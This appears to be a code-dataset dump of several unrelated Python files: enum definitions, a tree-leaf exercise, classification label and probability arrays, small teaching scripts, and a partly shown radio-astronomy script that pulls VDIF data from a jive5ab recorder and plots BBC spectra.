index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
8,000 | 5e86e97281b9d18a06efc62b20f5399611e3510d | from enum import Enum
EXIT_CODES = [
"SUCCESS",
"BUILD_FAILURE",
"PARSING_FAILURE",
"COMMAND_LINE_ERROR",
"TESTS_FAILED",
"PARTIAL_ANALYSIS_FAILURE",
"NO_TESTS_FOUND",
"RUN_FAILURE",
"ANALYSIS_FAILURE",
"INTERRUPTED",
"LOCK_HELD_NOBLOCK_FOR_LOCK",
"REMOTE_ENVIRONMENTAL_ERROR",
"OOM_ERROR",
"REMOTE_ERROR",
"LOCAL_ENVIRONMENT_ERROR",
"BLAZE_INTERNAL_ERROR",
"PUBLISH_ERROR",
"PERSISTENT_BUILD_EVENT_SERVICE_UPLOAD_ERROR"
]
class DistantEnum(Enum):
def __str__(self):
return str(self.value)
class CPU(DistantEnum):
k8 = "k8"
piii = "piii"
darwin = "darwin"
freebsd = "freebsd"
armeabi = "armeabi-v7a"
arm = "arm"
aarch64 = "aarch64"
x64_windows = "x64_windows"
x64_windows_msvc = "x64_windows_msvc"
s390x = "s390x"
ppc = "ppc"
ppc64 = "ppc64"
class CompilationMode(DistantEnum):
fastbuild = "fastbuild"
dbg = "dbg"
opt = "opt"
|
8,001 | 603cce951dd0f78ef3ca9dce587042b3b7f6b449 | """"
You are given a tree-like data structure represented as nested dictionaries.
Implement a function collect_leaves that accepts a tree and returns a list of all its leaves. A leaf is a bottom-most node in a tree.
Implement a kind of unit tests via assert operator.
"""
from typing import Union
def collect_leaves(u: Union[dict, list]) -> list:
flatten_list = []
if isinstance(u, dict):
for item in u.values():
flatten_list.extend(collect_leaves(item))
return flatten_list
return u
tree = {
"node1": {
"node11": {
"node111": [1, 2, 3],
"node112": [4, 5]
},
"node12": [6]
},
"node2": [7, 8, 9]
}
assert collect_leaves([1, 2, 3]) == [1, 2, 3]
assert collect_leaves(tree) == [1, 2, 3, 4, 5, 6, 7, 8, 9]
|
8,002 | 593d3221e34c0eef51228082d767d8516ec93ca2 |
y_true = [7, 3,
3,
4,
9,
9,
2,
5,
0,
0,
6,
3,
1,
6,
8,
7,
9,
7,
4,
2,
0,
1,
4,
1,
7,
7,
5,
0,
8,
0,
1,
7,
4,
2,
2,
4,
9,
3,
1,
7,
1,
2,
1,
7,
5,
9,
9,
4,
8,
5,
7,
2,
7,
5,
5,
6,
6,
1,
2,
6,
6,
5,
3,
2,
3,
8,
8,
8,
8,
5,
3,
4,
3,
2,
8,
1,
9,
0,
6,
8,
6,
1,
1,
1,
5,
4,
8,
8,
5,
5,
8,
6,
4,
4,
6,
9,
8,
1,
5,
5]
y_pred_prob = [
[0.0597563199698925,
0.1344364434480667,
0.1173347756266594,
0.11292721331119537,
0.10652001202106476,
0.13155865669250488,
0.10057594627141953,
0.10029518604278564,
0.10313529521226883,
0.03346000984311104],
[0.0002930850023403764,
0.23393571376800537,
0.09061524271965027,
0.21862193942070007,
0.04659481346607208,
0.04461496323347092,
0.0952368974685669,
0.2075100988149643,
0.0616493821144104,
0.0009278177167288959],
[0.22330643236637115,
1.0582012919257977e-06,
0.22777651250362396,
0.20880192518234253,
9.877869615593227e-07,
0.0006437229458242655,
0.1556401550769806,
7.201562368663872e-08,
0.18382851779460907,
5.064675860921852e-07],
[1.7682419638731517e-05,
0.001197152421809733,
0.015430454164743423,
0.0037515582516789436,
0.32882484793663025,
0.0003495111595839262,
0.012810198590159416,
0.054448556154966354,
0.30387693643569946,
0.27929291129112244],
[0.16070464253425598,
4.810986276027052e-09,
0.15206283330917358,
0.004463076591491699,
0.1652054488658905,
0.0038724008481949568,
0.17216043174266815,
0.13407163321971893,
0.029512932524085045,
0.17794682085514069],
[0.10922636836767197,
2.2864300319724862e-07,
0.11546860635280609,
0.001813476555980742,
0.1788507103919983,
0.005888130981475115,
0.18413811922073364,
0.10866158455610275,
0.10712066292762756,
0.18883220851421356],
[0.005557563621550798,
0.0001692363148322329,
0.35343053936958313,
0.0015008420450612903,
0.00037875055568292737,
0.2150292843580246,
0.014169459231197834,
0.03244209289550781,
0.33539846539497375,
0.041923996061086655],
[0.193454310297966,
3.662989183794707e-05,
0.10065275430679321,
0.00039752188604325056,
0.16119857132434845,
0.19390884041786194,
0.07022294402122498,
0.02460072562098503,
0.16083283722400665,
0.0946948304772377],
[0.28058794140815735,
1.1208027217435301e-06,
0.018203848972916603,
0.16030532121658325,
0.00018859952979255468,
0.21325571835041046,
0.2328961044549942,
0.007604319602251053,
0.04473938047885895,
0.04221738502383232],
[0.1718112975358963,
7.514636672567576e-05,
0.15386143326759338,
0.008414546959102154,
0.001738831982947886,
0.15720322728157043,
0.17100712656974792,
0.15586316585540771,
0.104509636759758,
0.07551562041044235],
[0.001471314812079072,
0.008587654680013657,
0.0367623046040535,
0.011750160716474056,
0.07068527489900589,
0.4173307418823242,
0.12449752539396286,
0.014547907747328281,
0.2990296185016632,
0.01533727627247572],
[0.005052714608609676,
0.0073812128975987434,
0.009834956377744675,
0.33292853832244873,
0.0018518454162403941,
0.0015299966325983405,
0.002040529390797019,
0.3055168688297272,
0.32741934061050415,
0.006443792954087257],
[0.0011697597801685333,
0.20749542117118835,
0.07009387016296387,
0.08994801342487335,
0.09965154528617859,
0.060963381081819534,
0.13158728182315826,
0.1365581601858139,
0.11990636587142944,
0.08262615650892258],
[0.020798824727535248,
1.469431822442857e-06,
0.016172533854842186,
0.021048342809081078,
0.009139545261859894,
0.3956705331802368,
0.3814408779144287,
7.980810551089235e-06,
0.1391601711511612,
0.016559595242142677],
[0.0008747534011490643,
0.0009511907119303942,
0.055323366075754166,
0.05426914989948273,
0.03363798186182976,
0.12827005982398987,
0.03197509050369263,
0.0008451330941170454,
0.37859639525413513,
0.3152569532394409],
[0.001832291018217802,
9.253426833311096e-05,
0.27192848920822144,
0.18078717589378357,
0.004130060318857431,
0.00929891224950552,
0.1695500910282135,
0.29965919256210327,
0.020460698753595352,
0.042260222136974335],
[0.15259969234466553,
0.00015921871818136424,
0.16849327087402344,
0.002068838570266962,
0.17735524475574493,
0.02342645265161991,
0.18245863914489746,
0.00010533139720791951,
0.11123484373092651,
0.1820984184741974],
[0.18936939537525177,
1.7293215250901994e-06,
0.029253976419568062,
0.1424887329339981,
0.01099975686520338,
0.0074686696752905846,
0.053486552089452744,
0.2111600935459137,
0.14551354944705963,
0.21025745570659637],
[3.861714503727853e-05,
0.1669524759054184,
0.00032175786327570677,
0.15850232541561127,
0.1955566704273224,
0.012984608300030231,
0.14730143547058105,
0.066555455327034,
0.1175893247127533,
0.13419757783412933],
[0.1504199206829071,
0.006808706559240818,
0.22468900680541992,
0.18946652114391327,
1.2391226846375503e-05,
0.10332755744457245,
0.15032899379730225,
2.30663204092707e-06,
0.17487214505672455,
7.243863365147263e-05],
[0.23918452858924866,
5.279692683046733e-09,
0.0671931579709053,
0.2041931003332138,
9.380520350532606e-05,
0.18892300128936768,
0.16166524589061737,
1.2340686907919007e-06,
0.1280936300754547,
0.010652361437678337],
[0.0019602354150265455,
0.17319674789905548,
0.16884981095790863,
0.025876348838210106,
0.11373495310544968,
0.034116633236408234,
0.09377618134021759,
0.16857513785362244,
0.10720878094434738,
0.11270517110824585],
[0.006008224096149206,
7.275425741681829e-05,
0.002679133554920554,
0.005456522107124329,
0.2852444648742676,
0.007294526789337397,
0.26774612069129944,
0.0033797386568039656,
0.15357472002506256,
0.26854372024536133],
[0.0020487161818891764,
0.18302913010120392,
0.17970730364322662,
0.03157859668135643,
0.10424197465181351,
0.028137331828475,
0.049388039857149124,
0.17323219776153564,
0.13171784579753876,
0.11691895872354507],
[0.011249794624745846,
0.0003711018362082541,
0.32693105936050415,
0.0010822461917996407,
0.0076926033943891525,
0.04566335678100586,
0.005700047593563795,
0.32916736602783203,
0.09476791322231293,
0.17737449705600739],
[0.0001925578253576532,
7.067231763357995e-06,
0.0001896199828479439,
0.09954455494880676,
0.23005598783493042,
0.2152310460805893,
0.09002267569303513,
0.017976609990000725,
0.0920918807387352,
0.25468799471855164],
[0.0006383731961250305,
3.095208057857235e-06,
0.0005969868507236242,
0.41469672322273254,
0.0053739529103040695,
0.40698617696762085,
0.08218759298324585,
0.0003528161614667624,
0.07473969459533691,
0.014424380846321583],
[0.19537049531936646,
3.243912300235352e-13,
0.005169959273189306,
0.17694340646266937,
2.949438930954784e-05,
0.1400780826807022,
0.18864554166793823,
3.857006959151477e-06,
0.18823771178722382,
0.10552132874727249],
[0.009722508490085602,
3.8531984500878025e-06,
0.07383214682340622,
0.03598225489258766,
0.07267675548791885,
0.1459459662437439,
0.07249364256858826,
0.002293274737894535,
0.48588359355926514,
0.1011660099029541],
[0.21651780605316162,
9.559274261050632e-09,
0.14371894299983978,
0.13431811332702637,
2.7394575226935558e-05,
0.1838626116514206,
0.17265450954437256,
0.00012304158008191735,
0.12219242751598358,
0.0265849307179451],
[4.430914850672707e-05,
0.2043066918849945,
0.0002825123374350369,
0.16263452172279358,
0.1939067542552948,
0.1427866667509079,
0.11921370774507523,
0.0028419536538422108,
0.06556723266839981,
0.10841585695743561],
[0.004471424967050552,
0.1858968585729599,
0.17653658986091614,
0.01416453905403614,
0.008144107647240162,
0.0843614935874939,
0.05890577659010887,
0.18505530059337616,
0.10232891887426376,
0.18013498187065125],
[0.00041712025995366275,
1.1021310228898074e-06,
0.08412905037403107,
0.0002837374631781131,
0.2740859091281891,
0.013903344981372356,
0.08929961919784546,
0.2733091115951538,
0.2233879268169403,
0.04118315503001213],
[0.04552318528294563,
0.020853176712989807,
0.26410210132598877,
0.23437173664569855,
2.1701146124541992e-06,
0.10220374912023544,
0.07447297871112823,
7.592303154524416e-05,
0.25814488530158997,
0.00025002588517963886],
[0.024719374254345894,
0.00217414740473032,
0.26734668016433716,
0.17261573672294617,
0.003498602891340852,
0.05698162689805031,
0.2737174332141876,
8.039058593567461e-05,
0.19880186021327972,
6.410985952243209e-05],
[0.12234598398208618,
6.703280632791575e-06,
0.015603234991431236,
0.013786871917545795,
0.21616478264331818,
0.005412149243056774,
0.11406012624502182,
0.12291428446769714,
0.18262456357479095,
0.20708128809928894],
[0.193313866853714,
6.033819488493464e-08,
0.14491458237171173,
0.2349807769060135,
0.0006736826617270708,
0.003743150969967246,
0.12457092851400375,
0.004962997976690531,
0.23268520832061768,
0.060154590755701065],
[0.006641837302595377,
0.005113706924021244,
0.060135774314403534,
0.37294134497642517,
0.0001917753543239087,
0.35536521673202515,
0.003515040036290884,
0.00014136293611954898,
0.19584619998931885,
0.00010780058073578402],
[0.00022568553686141968,
0.1758676916360855,
0.08169379830360413,
0.11927571147680283,
0.14987629652023315,
0.026822827756404877,
0.09613550454378128,
0.14441852271556854,
0.11029191315174103,
0.09539227187633514],
[0.028152454644441605,
0.04798303544521332,
0.06989692151546478,
0.07051544636487961,
0.07356826215982437,
0.05468234792351723,
0.11397064477205276,
0.2294078767299652,
0.0822836384177208,
0.22953952848911285],
[0.0009083361364901066,
0.16873282194137573,
0.040142301470041275,
0.13509070873260498,
0.16045929491519928,
0.09148524701595306,
0.0939648225903511,
0.13889746367931366,
0.043392572551965714,
0.12692658603191376],
[7.008769898675382e-05,
0.0012455701362341642,
0.4437786936759949,
0.03154001384973526,
0.0033613061532378197,
0.0024434190709143877,
0.3866567313671112,
0.0005211094976402819,
0.13020911812782288,
0.00017409549036528915],
[0.00034864526242017746,
0.21021592617034912,
0.005514794960618019,
0.11704950034618378,
0.08421261608600616,
0.13176649808883667,
0.11882488429546356,
0.008054501377046108,
0.1467529684305191,
0.1772596538066864],
[0.036879003047943115,
0.0014911789912730455,
0.2685071527957916,
0.0029583016876131296,
0.011879128403961658,
0.030892902985215187,
0.08989892154932022,
0.29645001888275146,
0.04054954648017883,
0.2204938679933548],
[0.0064177061431109905,
0.0045189931988716125,
0.013788403943181038,
0.18153700232505798,
0.0003662402159534395,
0.5257023572921753,
0.06426692008972168,
9.742573638504837e-06,
0.2026320844888687,
0.000760772149078548],
[0.0017538872780278325,
0.0002046643348876387,
0.04638877511024475,
0.11219469457864761,
0.1732793003320694,
0.000888414157088846,
0.1527005136013031,
0.171849325299263,
0.16653017699718475,
0.17421048879623413],
[6.957617006264627e-05,
3.015168840647675e-05,
0.05601977929472923,
0.06104991212487221,
0.14622464776039124,
0.0013683908618986607,
0.004713970702141523,
0.26153290271759033,
0.21816983819007874,
0.25082090497016907],
[0.001964711584150791,
0.14094221591949463,
0.04670453444123268,
0.11537310481071472,
0.1456061750650406,
0.021807175129652023,
0.1023702397942543,
0.14592182636260986,
0.1320936679840088,
0.14721626043319702],
[0.0013557883212342858,
5.542307803807489e-07,
0.015518834814429283,
0.020929962396621704,
0.12795883417129517,
0.012969551607966423,
0.011510342359542847,
0.3424086570739746,
0.3332746922969818,
0.1340728998184204],
[0.0951327458024025,
0.03636496141552925,
0.018829435110092163,
0.060135968029499054,
0.1569897085428238,
0.1514764130115509,
0.13258931040763855,
0.1450430303812027,
0.04603665694594383,
0.15740196406841278],
[0.17052830755710602,
1.5615187294315547e-06,
0.0013229812029749155,
0.12005076557397842,
0.021564221009612083,
0.024421295151114464,
0.17088675498962402,
0.15222683548927307,
0.1693890392780304,
0.16960804164409637],
[0.006946968380361795,
0.3011370897293091,
0.3187958002090454,
0.06604688614606857,
0.011190904304385185,
0.05437859520316124,
0.020502492785453796,
0.010224146768450737,
0.21062366664409637,
0.00015340560639742762],
[0.003341993084177375,
0.0016007163794711232,
0.0007675797096453607,
0.18986503779888153,
0.1190534457564354,
0.02811228297650814,
0.09639428555965424,
0.21583504974842072,
0.13505271077156067,
0.2099769562482834],
[0.042331017553806305,
0.00029962626285851,
0.0023094473872333765,
0.18676534295082092,
0.000317152967909351,
0.48982951045036316,
0.1871659755706787,
8.205944141082e-06,
0.09039845317602158,
0.0005752819124609232],
[0.27066469192504883,
0.0001488085399614647,
0.025224560871720314,
0.03236522525548935,
0.00022321399592328817,
0.3199988305568695,
0.20726615190505981,
2.1540354282478802e-05,
0.13308577239513397,
0.011001424863934517],
[0.21046556532382965,
8.32586906085453e-08,
0.050842639058828354,
0.0012313498882576823,
0.17998859286308289,
0.005802170839160681,
0.22032563388347626,
9.771327313501388e-06,
0.2085702270269394,
0.12276387959718704],
[0.278763085603714,
2.956639932882865e-10,
0.2363770455121994,
0.0021949675865471363,
0.024400619789958,
0.01081052329391241,
0.2788945734500885,
0.000592902593780309,
0.09800171107053757,
0.06996453553438187],
[0.0012440741993486881,
0.0002501744020264596,
0.039189230650663376,
0.003109667217358947,
0.1353403925895691,
0.17648975551128387,
0.29823172092437744,
0.0005026640137657523,
0.1873668134212494,
0.15827545523643494],
[4.636057929019444e-05,
0.004471238702535629,
0.010865537449717522,
0.03406133875250816,
0.2391168773174286,
0.0102084307000041,
0.24508318305015564,
0.10957624763250351,
0.10304577648639679,
0.24352511763572693],
[0.007771539501845837,
0.003819737583398819,
0.05605701357126236,
0.0013185413554310799,
0.026425426825881004,
0.37273845076560974,
0.39364394545555115,
3.468452996457927e-05,
0.13644644618034363,
0.0017443000106140971],
[0.0042862421832978725,
4.118454022261631e-09,
0.24541069567203522,
1.311416235694196e-05,
0.002639196580275893,
0.2002275139093399,
0.35612747073173523,
8.159701246768236e-05,
0.11912810802459717,
0.07208611816167831],
[0.10790199786424637,
0.00018712706514634192,
0.001723292050883174,
0.3369658291339874,
0.005216643214225769,
0.323357492685318,
0.04629630222916603,
0.0006358266109600663,
0.17700347304344177,
0.0007120332447811961],
[0.01004449650645256,
0.0038342783227562904,
0.0029477709904313087,
0.39860454201698303,
0.000900272571016103,
0.32782217860221863,
0.010686549358069897,
0.0006012170924805105,
0.23407192528247833,
0.010486727580428123],
[0.0015078516444191337,
0.23596949875354767,
0.4038705825805664,
0.04463784024119377,
0.00036313795135356486,
0.005906661506742239,
0.012559221126139164,
0.010579549707472324,
0.2843676507472992,
0.0002381248341407627],
[0.1887362003326416,
0.0019065006636083126,
0.2840288579463959,
0.2984219193458557,
4.9067231884691864e-05,
0.1615515947341919,
0.012938770465552807,
0.00029289082158356905,
0.052058152854442596,
1.6269357729470357e-05],
[0.0006827416946180165,
2.276465056638699e-05,
0.023704057559370995,
0.16121432185173035,
0.0033186341170221567,
0.004117893520742655,
0.03627816215157509,
0.009822812862694263,
0.7281517386436462,
0.032687313854694366],
[0.0011369712883606553,
0.27387163043022156,
0.07185991108417511,
0.15628814697265625,
0.002854800783097744,
0.23154565691947937,
0.03204796463251114,
0.003870188258588314,
0.22623319923877716,
0.00029159500263631344],
[0.0035695999395102262,
0.26706114411354065,
0.1508740484714508,
0.0013921442441642284,
0.019328434020280838,
0.13771453499794006,
0.029891734942793846,
0.03509771451354027,
0.24692872166633606,
0.1081417053937912],
[0.000882012362126261,
2.536918327677995e-05,
0.0450599268078804,
0.412322998046875,
0.0025211411993950605,
0.002278776839375496,
0.011372447945177555,
0.1770726591348648,
0.33388030529022217,
0.014584112912416458],
[0.21903501451015472,
5.910552047794226e-09,
0.022012481465935707,
0.20099963247776031,
1.0874355211853981e-05,
0.21909210085868835,
0.21668335795402527,
4.337367798257219e-08,
0.12212178856134415,
4.4732783862855285e-05],
[0.014651631936430931,
0.00830799899995327,
0.005935078486800194,
0.3953670263290405,
1.1293817806290463e-05,
0.4299878776073456,
0.017106691375374794,
0.00014334742445498705,
0.11808823049068451,
0.010400976054370403],
[0.010301091708242893,
0.01435689628124237,
0.07430031895637512,
0.06989920139312744,
0.2338510900735855,
0.053795550018548965,
0.22257547080516815,
0.0029012206941843033,
0.09203658252954483,
0.22598253190517426],
[0.033016644418239594,
0.0020125852897763252,
0.06661045551300049,
0.4920836091041565,
0.00025867935619316995,
0.07482428848743439,
0.13923810422420502,
0.00012527030776254833,
0.19180776178836823,
2.269313517899718e-05],
[0.1325867474079132,
0.004940022714436054,
0.22300080955028534,
0.2727201282978058,
3.310650572529994e-05,
0.12915031611919403,
0.01339033618569374,
1.0927167750196531e-05,
0.22410929203033447,
5.8520683523966e-05],
[0.126132994890213,
0.0013935434399172664,
0.17098797857761383,
0.00039779843064025044,
0.07732491940259933,
0.16493096947669983,
0.014501826837658882,
0.03405503183603287,
0.20594964921474457,
0.2043251097202301],
[0.0008475463255308568,
0.19114449620246887,
0.03174148499965668,
0.1596948355436325,
0.1830475926399231,
0.11398201435804367,
0.11080365628004074,
0.10536272078752518,
0.05745834857225418,
0.04591764137148857],
[0.0009525367058813572,
0.0012388192117214203,
0.0006522738258354366,
0.15977761149406433,
0.2019728273153305,
0.037797972559928894,
0.19880010187625885,
0.008799873292446136,
0.18693988025188446,
0.20306788384914398],
[0.21417981386184692,
1.8215121144748991e-07,
0.11546390503644943,
0.10518436878919601,
5.3784842748427764e-05,
0.17964830994606018,
0.1753360480070114,
0.005312803667038679,
0.07569659501314163,
0.1291242241859436],
[0.03322113677859306,
1.1228289409359604e-08,
0.11529551446437836,
0.006697801407426596,
0.020004654303193092,
0.2904326617717743,
0.3397071361541748,
6.173769179440569e-06,
0.1187906265258789,
0.07584403455257416],
[0.00018722846289165318,
0.00015633362636435777,
0.027305739000439644,
0.30433472990989685,
0.12216899544000626,
0.0051543135195970535,
0.07717369496822357,
5.6467473768861964e-05,
0.46220865845680237,
0.0012535307323560119],
[0.2223890870809555,
1.8010264568601997e-07,
0.051188305020332336,
0.06915734708309174,
0.007792292162775993,
0.13037307560443878,
0.4795873761177063,
6.65841726004146e-05,
0.03377178683876991,
0.0056741489097476006],
[0.0011432061437517405,
0.172257199883461,
0.08959532529115677,
0.09976792335510254,
0.13487820327281952,
0.025573352351784706,
0.11224105209112167,
0.1427890509366989,
0.12529729306697845,
0.09645748883485794],
[0.00039081714930944145,
0.17529502511024475,
0.07816692441701889,
0.12808731198310852,
0.13959045708179474,
0.04451143741607666,
0.07863735407590866,
0.1518080085515976,
0.09225541353225708,
0.11125729233026505],
[0.0005360758514143527,
0.1871286779642105,
0.09343081712722778,
0.10187795013189316,
0.15403643250465393,
0.03745483607053757,
0.10108820348978043,
0.1381213515996933,
0.1196260005235672,
0.0666997954249382],
[0.02377643622457981,
0.002874232828617096,
0.06835681945085526,
0.08628982305526733,
0.16734763979911804,
0.1884264051914215,
0.06887176632881165,
0.1883554309606552,
0.11966855823993683,
0.0860329195857048],
[0.0019290593918412924,
0.0004132240719627589,
0.08087942749261856,
0.00133050128351897,
0.2057691514492035,
0.014698517508804798,
0.10668473690748215,
0.2002524882555008,
0.19643288850784302,
0.19160999357700348],
[4.1589693864807487e-05,
3.0074079404585063e-06,
0.00946643017232418,
0.0028675245121121407,
0.339987188577652,
0.006530506536364555,
0.21062259376049042,
5.006019819120411e-06,
0.4303286373615265,
0.00014742799976374954],
[0.23467645049095154,
3.957170217048535e-14,
0.016559595242142677,
0.22702592611312866,
0.0004185910802334547,
0.0031147561967372894,
0.2260916531085968,
2.4497327899553056e-07,
0.2333890199661255,
0.05872354656457901],
[0.1723964959383011,
1.4810979109824984e-07,
0.001400468056090176,
0.3012116253376007,
0.00017689657397568226,
0.29611334204673767,
0.013564502820372581,
0.04992862418293953,
0.15185707807540894,
0.013350787572562695],
[0.18757264316082,
1.502647393181178e-07,
0.0013043361250311136,
0.08373606950044632,
0.0005724140792153776,
0.1799388974905014,
0.14538954198360443,
0.16594813764095306,
0.06483398377895355,
0.17070381343364716],
[0.008307700976729393,
0.0005032537155784667,
0.04173918813467026,
0.055757056921720505,
0.2954571545124054,
0.046274807304143906,
0.15145555138587952,
0.00160416669677943,
0.36763912439346313,
0.031262170523405075],
[0.03202534094452858,
2.929154447883775e-07,
0.03331722691655159,
0.0002443870762363076,
0.021324075758457184,
0.3864181637763977,
0.39420267939567566,
3.2187076612899546e-06,
0.08215467631816864,
0.050310224294662476],
[0.03041147254407406,
3.317395247393051e-10,
0.013215649873018265,
0.009000282734632492,
0.15260590612888336,
9.569835674483329e-05,
0.22718068957328796,
0.0983223170042038,
0.23328886926174164,
0.23587895929813385],
[0.0017376767937093973,
0.01800091378390789,
0.09461784362792969,
0.008886604569852352,
0.23299837112426758,
0.03532419353723526,
0.20058980584144592,
0.1702878624200821,
0.06943482160568237,
0.1681220531463623],
[0.26592451333999634,
1.378083283043452e-07,
0.26663097739219666,
0.00043869472574442625,
0.0753256231546402,
0.000345755455782637,
0.2718716561794281,
0.09590824693441391,
0.021168876439332962,
0.0023856020998209715],
[0.007719929795712233,
0.000273746729362756,
0.06954099237918854,
0.11292484402656555,
0.17693056166172028,
0.0036023242864757776,
0.16335690021514893,
0.1139131560921669,
0.17289915680885315,
0.17883846163749695],
[0.0002722161589190364,
0.0014734293799847364,
0.0001780118327587843,
0.0718056932091713,
0.219150573015213,
0.02937471494078636,
0.15243956446647644,
0.07647080719470978,
0.21917390823364258,
0.22966115176677704],
[0.0008591399528086185,
0.27216723561286926,
0.030793067067861557,
0.040201541036367416,
0.07587726414203644,
0.06215333193540573,
0.16188929975032806,
0.04154059290885925,
0.21999017894268036,
0.09452840685844421],
[0.156771719455719,
0.0009459690772928298,
0.08676373958587646,
0.012071664445102215,
0.046294376254081726,
0.1705559939146042,
0.05631829798221588,
0.16554586589336395,
0.14995504915714264,
0.15477733314037323],
[0.0036007703747600317,
0.0036146841011941433,
0.007429149001836777,
0.10190737992525101,
0.0016259902622550726,
0.45585712790489197,
0.04189519211649895,
7.317630092984473e-07,
0.3802386522293091,
0.003830441040918231]]
|
8,003 | f218f47acfb078877645de26c64e57f92dbcd953 | import utilities
import sys
if __name__ == "__main__":
print('I am main!')
else:
print(__name__)
for i in range(0,6):
print(i)
mylist = [12, 13, 14, 13, 12]
print(mylist)
#Enter iterations to run [0-5]
#value = -1
value = 3
while (value not in range(0,6)):
try:
value = int(input('Enter #test runs [0-5]:'))
except ValueError:
print('Invalid value entered, retry')
print('Final value entered {}'.format(value))
dir(sys)
print('done!')
for i in mylist:
utilities.myfct(i, 'hi')
utilities.myfct1(i)
|
8,004 | 25ee13314c7cf828b8805d9f483bd5ee12073228 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from .BLWecc import (
curve,
setCurve,
getPublicKey,
getPrivateKey,
getAddress as getAddressByCode,
pub2add as getAddressByPublicKey,
sign,
verifyTx as verify,
)
|
8,005 | 46f3d3681343d96889ddb073f17ff7f225486f35 | my_list = [1, 2, 4, 0, 4, 0, 10, 20, 0, 1]
new_list = list(filter(lambda x: x != 0, my_list))
try:
new = list(map(lambda x: 2 / x, new_list))
except ZeroDivisionError:
pass
print(new)
# def devis(n, list):
# new_list = []
# for i, m_list in enumerate(list):
# try:
# new_list.append(n/m_list)
# except ZeroDivisionError:
# new_list.append(None)
# return new_list
# print(devis(2, my_list))
|
8,006 | 8eb08fa497ccf3ddc8f4d2b886c9e5a9bdb2e052 | #!/usr/bin/python
import socket, os, datetime, time, re, sys
import numpy as np
import matplotlib.pyplot as plt
from baseband import vdif
import astropy.units as u
from scipy.signal import resample_poly
import matplotlib.patches as patches
def fbcmd(message):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, int(port)))
sock.send(message.encode()) # convert message to bytestring
if DEBUG:
print('INFO: sent to '+ip+':'+port + ':' + message)
data = sock.recv(1024)
if DEBUG:
print('INFO: answer: ', data.decode())
sock.close()
return data.decode()
def get_singlefile_data(vbsname):
# TODO: Thread/IF selection in vmux step
disk2fileout = scriptdir+"/checkdata.vdif"
vmuxedfile = disk2fileout +".vmuxed"
ss = fbcmd("scan_set="+vbsname+":+2.0s:+"+extractiontime)
if " does not exist" in ss:
return [False, -1, 0, -1] # No single file data found
sc = fbcmd("scan_check?")
nbbcs = int(int(sc.split(":")[4])/2)
fbcmd("disk2file=" + disk2fileout + ":::w")
nwait = 0
time.sleep(0.25) # Wait for disk2file
while True:
stat = fbcmd("disk2file?")
if "inactive" in stat:
break
if nwait>5:
print("ERROR: Waited more than 5 sec for disk2file! Something is wrong, exiting...")
sys.exit(1)
time.sleep(1) # Wait for disk2file
nwait+=1
vmuxcmd = "vmux -v {0} 8224 15625 0,1,2,3,4,5,6,7 {1}".format(disk2fileout, vmuxedfile)
os.system(vmuxcmd)
time.sleep(5) # Wait for vmux
# Read file
fh = vdif.open(vmuxedfile, 'rs', sample_rate=sample_rate*u.MHz) # Need to specify sample rate, too short to autodetect.
start_time = fh.info()['start_time']
# Ensure file pointer is at beginning of file
fh.seek(0)
# Read all data until end
ifdata = fh.read()
# Close infile
fh.close()
return [True, nbbcs, ifdata, start_time]
def get_multifile_data(vbs, nif):
vbsname = vbs+"_"+str(nif)
disk2fileout = scriptdir+"/checkdata.vdif"
ss = fbcmd("scan_set="+vbsname+":+2.0s:+"+extractiontime)
if " does not exist" in ss:
return [-1, 0, -1]
sc = fbcmd("scan_check?")
nbbcs = int(int(sc.split(":")[4])/2)
fbcmd("disk2file=" + disk2fileout + ":::w")
nwait = 0
time.sleep(0.25) # Wait for disk2file
while True:
stat = fbcmd("disk2file?")
if "inactive" in stat:
break
if nwait>5:
print("ERROR: Waited more than 5 sec for disk2file! Something is wrong, exiting...")
sys.exit(1)
time.sleep(1) # Wait for disk2file
nwait+=1
# Read file
fh = vdif.open(disk2fileout, 'rs', sample_rate=sample_rate*u.MHz) # Need to specify sample rate, too short to autodetect.
start_time = fh.info()['start_time']
# Ensure file pointer is at beginning of file
fh.seek(0)
# Read all data until end
ifdata = fh.read()
# Close infile
fh.close()
return [nbbcs, ifdata, start_time]
def plot_bbc(bbcdata, bbc, nif):
row=(nrows-1)-nif
col=bbc-nif*bbcsperIF # Assume nbbcs always the same
nfft = bbcdata.size
states = np.unique(bbcdata, return_counts=True)
sampler_stats = states[1]/nfft
ps = np.abs(np.fft.fft(bbcdata))**2
time_step = 1.0/sample_rate
freqs = np.fft.fftfreq(nfft, time_step)
idx = np.argsort(freqs)
# Spectrum is conjugate from - to +, only plot half...
nplot = int(nfft/2)
ps2plot = ps[idx][nplot:]
# Decimate signal to 128 points
down = int(nplot/nspec)
ps2plot_dec = resample_poly(ps2plot, 1, down)
fr2plot = np.linspace(0,bbcw, nspec)
# Plot
if nif%2==0:
color = "black"
else:
color= "red"
ax = axs[row][col]
ax.plot(fr2plot, ps2plot_dec, color=color)
if col==0:
ax.set_ylabel("IF "+ str(iflabels[nif]) + "\n"+str(start_time)[:-5].replace("T","\n"), rotation=0, ha='right', va="center")
ax.text(0.5, 0.35, "BBC{0:03d}".format(bbc+1), transform=ax.transAxes, ha="center")
#print("BBC{0:03d} sampler stats: {1} %".format(bbc+1, np.round(100*sampler_stats,1)))
start=0
for i,stat in enumerate(sampler_stats):
#if i%2==0:
if i in [0,3]:
scol = "blue"
else:
scol = "green"
ax.add_patch(patches.Rectangle( (start,0), width=stat, height=0.25, edgecolor="black", facecolor = scol, fill=True, transform=ax.transAxes))
start +=stat
itot = 0
for i in [0.18,0.33,0.33]: # last 0.18 not necessary
itot+=i
ax.axvline(x=itot*bbcw)
ax.set_xlim([0,bbcw])
ip = sys.argv[1] #ip = "localhost"
port = sys.argv[2] #port = "2621" # jive5ab control port
bbcw = int(sys.argv[3]) #bbcw = 32 # MHz, width of BBC
nspec = int(sys.argv[4]) #nspec = 256 # number of points in final spectrum
bbcsperIF = int(sys.argv[5]) #bbcsperIF = 8
DEBUG=False# Print jive5ab return messages, which are parsed for results
ifs2plot = [0,1,2,3,4,5,6,7] # List IFs to plot, starting from 0.
#Plot design
nrows = 8
ncols = bbcsperIF
extractiontime = "0.01s" # At least 0.01s
iflabels = ["A", "B", "C", "D", "E", "F", "G", "H"]
plt.rcParams.update({'font.size': 8})
sample_rate = 2*bbcw # MHz
scriptdir=os.path.dirname(os.path.realpath(__file__))
scres = fbcmd("scan_check?")
if "does not exist" in scres:
vbsfile = scres.split(":")[1].split("'")[1].strip()
else:
